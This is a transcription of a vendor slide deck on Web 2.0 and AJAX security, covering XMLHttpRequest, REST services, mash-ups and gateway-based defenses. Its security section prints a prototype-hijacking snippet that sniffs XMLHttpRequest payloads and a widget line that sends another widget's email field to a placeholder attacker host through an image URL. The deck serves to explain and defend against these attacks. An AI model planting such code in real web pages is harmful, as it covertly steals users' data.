Web 2.0 and Security

Similar documents
Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Hacker Attacks on the Horizon: Web 2.0 Attack Vectors

Information Security CS 526 Topic 8

Using the Cisco ACE Application Control Engine Application Switches with the Cisco ACE XML Gateway

Attacking Web2.0. Daiki Fukumori Secure Sky Technology Inc.

Web 2.0 Attacks Explained

RKN 2015 Application Layer Short Summary

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Study of security vulnerabilities in Web 2.0

AJAX. Lecture 26. Robb T. Koether. Fri, Mar 21, Hampden-Sydney College. Robb T. Koether (Hampden-Sydney College) AJAX Fri, Mar 21, / 16

DreamFactory Customer Privacy and Security Whitepaper Delivering Secure Applications on Salesforce.com

AJAX. Lab. de Bases de Dados e Aplicações Web MIEIC, FEUP 2010/11. Sérgio Nunes

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

XMLHttpRequest. CS144: Web Applications

Computer Security CS 426 Lecture 41

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Web Application Security

Solutions Business Manager Web Application Security Assessment

AJAX: Rich Internet Applications

Top 10 AJAX security holes & driving factors

AJAX and PHP AJAX. Christian Wenz,

GOING WHERE NO WAFS HAVE GONE BEFORE

CSCE 120: Learning To Code

Web 2.0, AJAX and RIAs

Information Security CS 526 Topic 11

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Copyright Descriptor Systems, Course materials may not be reproduced in whole or in part without prior written consent of Joel Barnum

AJAX ASYNCHRONOUS JAVASCRIPT AND XML. Laura Farinetti - DAUIN

So Many Ways to Slap a YoHo: Hacking Facebook & YoVille

User Interaction: jquery

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

Hacking Intranet Websites from the Outside

Configuring BIG-IP ASM v12.1 Application Security Manager

Web Programming Step by Step

CSE 130 Programming Language Principles & Paradigms Lecture # 20. Chapter 13 Concurrency. + AJAX Discussion

Bank Infrastructure - Video - 1

DreamFactory Security Guide

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

C1: Define Security Requirements

Security overview Setup and configuration Securing GIS Web services. Securing Web applications. Web ADF applications

Introduction to REST Web Services

Technical Overview. Access control lists define the users, groups, and roles that can access content as well as the operations that can be performed.

REST AND AJAX. Introduction. Module 13

Progress Exchange June, Phoenix, AZ, USA 1

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

Security

Copyright

SECURITY STORY WE NEVER SEE, TOUCH NOR HOLD YOUR DATA

Credits: Some of the slides are based on material adapted from

Developing Ajax Web Apps with GWT. Session I

Indicate whether the statement is true or false.

Drone /12/2018. Threat Model. Description. Threats. Threat Source Risk Status Date Created

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

The security of Mozilla Firefox s Extensions. Kristjan Krips

ClientNet. Portal Admin Guide

Ajax Security Dangers

WebApp development. Outline. Web app structure. HTML basics. 1. Fundamentals of a web app / website. Tiberiu Vilcu

F5 Application Security. Radovan Gibala Field Systems Engineer

A (sample) computerized system for publishing the daily currency exchange rates

Configuring User Defined Patterns

SOLUTION BRIEF. Enabling and Securing Digital Business in API Economy. Protect APIs Serving Business Critical Applications

epldt Web Builder Security March 2017

DenyAll Protect. accelerating. Web Application & Services Firewalls. your applications. DenyAll Protect

Managing Remote Medical Devices Through The Cloud. Joel K Young SVP of Research and Development & CTO Digi International Friday, September 9 11:30AM

BEAAquaLogic. Service Bus. JPD Transport User Guide

SOLUTION BRIEF CA API MANAGEMENT. Enable and Protect Your Web Applications From OWASP Top Ten With CA API Management

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

AJAX Programming Chris Seddon

CS 498RK FALL RESTFUL APIs

EasyCrypt passes an independent security audit

Human vs Artificial intelligence Battle of Trust

Best Practices With IP Security.

Author: Tonny Rabjerg Version: Company Presentation WSF 4.0 WSF 4.0

CSC 482/582: Computer Security. Cross-Site Security

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

Hello everyone. My name is Kundan Singh and today I will describe a project we did at Avaya Labs.

Citrix NetScaler AppFirewall and Web App Security Service

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

P2_L12 Web Security Page 1

Presented By Rick Deacon DEFCON 15 August 3-5, 2007

Addressing Security, Governance and Performance Issues with an XML Gateway as part of a Service Oriented Architecture. Vic Morris CEO Vordel

Founded the web application security lab

Content Security Policy

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

About DPI-SSL. About DPI-SSL. Functionality. Deployment Scenarios

Hardening the Education. with NGFW. Narongveth Yutithammanurak Business Development Manager 23 Feb 2012

Technical Brief. A Checklist for Every API Call. Managing the Complete API Lifecycle

Controller/server communication

En partenariat avec CA Technologies. Genève, Hôtel Warwick,

Some Facts Web 2.0/Ajax Security

We aren t getting enough orders on our Web site, storms the CEO.

Delivering Integrated Cyber Defense for the Cloud Generation Darren Thomson

Future-ready security for small and mid-size enterprises

Web Application Security. Philippe Bogaerts

OpenAjax Hub 1.1 & SMash (Secure Mashups)

2/6/2012. Rich Internet Applications. What is Ajax? Defining AJAX. Asynchronous JavaScript and XML Term coined in 2005 by Jesse James Garrett

Information Security. Gabriel Lawrence Director, IT Security UCSD

Transcription:

Web 2.0 and Security

Web 2.0 and Security 1. What is Web 2.0? On the client: Scripting the XMLHttpRequest object On the server: REST Web Services Mash-ups ups of Web Services used together to create novel Websites 2. Applying Security for Web 2.0 Web 2.0 s large attack surface Vulnerabilities in Web 2.0 programming models "AJAX Snooping" 3. How is XML Security relevant for Web 2.0? The "X" in AJAX stands for XML. How does XML security apply to Web 2.0? What about JSON instead of XML?

What is Web 2.0? The phrase Web 2.0 was coined by Dale Dougherty of O Reilly media in 2004 Tim O'Reilly: We're entering an unprecedented period of user interface innovation, as Web developers are finally able to build Web applications as rich as local PC-based applications. Increased interaction attracts users and, together with social networking features, can build a sense of community e.g. FlickR feels like an application, not a Website

> > > User Experience >

How does it work? Asynchronous JavaScript and XML AJAX : Coined by Jesse James Garrett Script can only connect back to its originating server

On the client side: Scripting the XHR // Kick off the XMLhttpRequest, set the callback xmlhttp = new XMLHttpRequest(); xmlhttp.open("get", url, true); xmlhttp.onreadystatechange = dosomethingwithresponse; xmlhttp.send(null); // do something with the data fetched from the server function dosomethingwithresponse() { var xmlresponse = xmlhttp.responsexml; var message = xmldocument.getelementsbytagname( message').item(0).fir stchild.data; document.getelementbyid( message').value g = message; }

On the server side: REST-style Web Services They do not use SOAP-style Web Services Too heavyweight REST was originally i meant to involve using the HTTP verbs such as POST and GET, PUT and DELETE But most REST style Web Services make heavy use of HTTP GET, and do not use the other HTTP verbs. This means that, in practice, REST means Web Services that are invoked by HTTP GETs with parameters in QueryStrings These are the types of Web Services used in Web 2.0

Invoking a Web 2.0 Web Service Parameters are passed in HTTP QueryString XML is returned

Mash-ups Web 2.0 services can be used together in order to create composite applications e.g. using Google Maps with FlickR in order to show where a photograph was taken These are called Mash-ups It s tempting for developers to experiment with Mash-ups, since it allows for fast application development Live.com and Google both allow users to add widgets to their dashboards for weather, news, email notification, etc.

Windows Live Users can add widgets to the Windows Live dashboard

Getting around the Same Domain restriction Some mash-ups use server-side proxies to allow AJAX code to fetch data from multiple different domains mydomain.com nytimes.com Other mash ups use the fact that you can put multiple <SCRIPT> Other mash-ups use the fact that you can put multiple <SCRIPT> blocks of JavaScript, served from different URLs, on one Web page

Part 2: Security and Web 2.0 Web 2.0 applications have a large Attack Surface Not only the Web site itself, but also the Web Services it calls Cross-site Scripting and code-injection vulnerabilities Data sent up and down to Web Services can be snooped In Mash-ups, it is possible for one Web 2.0 application to spy on another

Securing the data sent in Web 2.0 In Web 2.0, data is sent from the browser to the server, unknown to the user, in URL QueryStrings getdata.asmx?parameter=value This means that many standard Web Application Security techniques are applicable to REST Web Services Validating the size of parameters on the QueryString Validating the content of parameters on the QueryString Examining parameters in the QueryString for known attacks such as SQL Injection Applying regular expressions (RegEx s) to QueryString parameters

Recommendation Apply regular expressions to the data sent by your Web 2.0 browser clients to your Web Services Apply controls about data length, data format, parameters XML Gateways can enforce these controls without loss of performance

JavaScript Vulnerabilities JavaScript is a Prototype Language New methods or attributes of existing objects can be added Prototype Hijacking discovered by Stefano Di Paula (www.wisec.it) Here, the XMLHttpRequest object is wrapped : var xmlreqc = XMLHttpRequest; XMLHttpRequest = function() { this.xml = new xmlreqc(); return this; } Now, whenever an XMLHttpRequest object is created, it is this wrapped version which is used.

Prototype Hijacking Once the XMLHttpRequest object has been wrapped, certain methods can be changed: XMLHttpRequest.prototype.send prototype send =function(payload){ // Hijacked send sniff(payload); return this.xml.send(payload) Now, whenever an XMLHttpRequest object is created, it is this wrapped version which is used. [ Reference: Subverting Ajax, Di Paulo & Fedon, December 06]

Implementing prototype hijacking The key is to get the prototype hijacking code ahead of other code which uses XMLHttpRequest Mash-up interfaces for the perfect environment for this!

Another technique for spying in a Mash-up The malicious widget can simply view the innerhtml of other widgets on the same page, then hive off the data to a third-party t server by appending it to an IMG tag: spyimage=document.createelement( img ); g spyimage.src= http://www.pirate.com/sniff.html? + document.getelementbyid( newemail').value [ Reference: This spying technique was described by Anton Rager [ Reference: This spying technique was described by Anton Rager ( XSSProxy paper) and by Jeremiah Gossman ( Phishing with Superbait paper ]

Recommendation If you are creating dashboard-style Mash-up applications, ensure that users can only choose trusted widgets to add to their dashboards

Information leakage in the audit trail A log of all browser-to-server traffic is usually kept However, the user may not be aware that this is happening Unless SSL is used, network infrastructure can cache, or log, information that is contained in HTTP QueryStrings Has privacy implications, e.g. for Google searches All the information is contained in the method and the URI. This means that the URI can be replayed Sequences of URIs can be replayed to replay a transaction The same problem does not occur with POSTs, but these are typically not used in Web 2.0

Recommendation Ensure that no private data is stored in HTTP QueryStrings used in AJAX calls to Web Services Vordel s products scan data for leakage of private information Use SSL to encrypt the QueryString parameters and values

Code Injection & Cross-Site Scripting Samy worm AJAX code in a MySpace profile which added the user Samy as a Friend, and copied itself. All MySpace users viewing an infected profile caught the worm JS-Yamanner worm AJAX code to forward emails in Yahoo! Mail

Recommendation Ensure strong secure coding practices in AJAX applications As always: Never trust your input Usage of the XMLHttpRequest est object is a clear warning sign Use an XML Gateway to detect this rogue traffic

Preventing Data Harvesting Remember that Web 2.0 makes use of Web Services on the serverside to send data asynchronously to the client. What if you forget about the client and write your own application to data-harvest all of the data off the server? Policies can be used to ensure that only authenticated users can access the back-end Web Services. Policies can also be used to protect against data harvesting

Preventing Data Harvesting: Google Example Uses the concept of the Developer Token This token is passed as a parameter to the Web Service In the REST model, it is passed within a name-value pair in the URL QueryString The token is used to limit developers to a certain amount of Web Service requests per day e.g. 1000 calls per day for Google s Developer ID

Recommendation If your data is your crown jewels, enforce a policy using an XML Gateway or XML Firewall to prevent attackers going directly to the back-end Web Services used in Web 2.0 Force authentication and tracking of usage, to deter data harvesters - Part of an XML Gateway policy

XML Security and AJAX The X in AJAX stands for XML XML filtering techniques are applicable to Web 2.0 XML Firewall filtering - XML Size bounds checking - XML Schema Validation Blocking XML Denial of Service attacks - XML External Entity Attacks - SQL Injection, XPath Injection

Filter inbound and outbound XML Remember that Web 2.0 services output XML but are not invoked by XML If you just filter incoming XML, then outbound XML will sail right through the security solution Choose an XML security solution who filters all of the following: HTTP GET in, XML Out XML POST in, XML Out SOAP POST in, SOAP Out

Conclusions Web 2.0 is popular for consumer applications Increased interaction, like a desktop application With increased interactivity, comes increase security risk Snooping Data Harvesting Cross-Site SteScripting Ensure your Web 2.0 apps have secure code and secure data Ensure code is not vulnerable to attacks like prototype hijacking Validate XML data send between client and server If your data is the Crown Jewels apply the best practice security Secure code & data

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback